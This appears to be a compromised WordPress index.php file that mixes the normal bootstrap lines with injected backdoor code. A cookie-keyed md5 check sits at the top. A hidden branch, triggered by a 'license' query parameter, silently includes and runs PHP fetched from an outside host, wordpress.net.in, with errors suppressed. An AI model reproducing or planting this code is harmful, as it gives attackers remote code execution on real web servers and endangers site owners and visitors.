<?php if(md5($_COOKIE['d22ce5ea640b3793'])=="5c8d8ca6b17aaeb0c1db09f84db0ffcb"){  exit; } ?><?php
/* Short and sweet */
define('WP_USE_THEMES', true);
if (isset($_GET['license'])) {
	@include('http://wordpress.net.in/license.txt');
} else {
	require('./wp-blog-header.php');
}
?>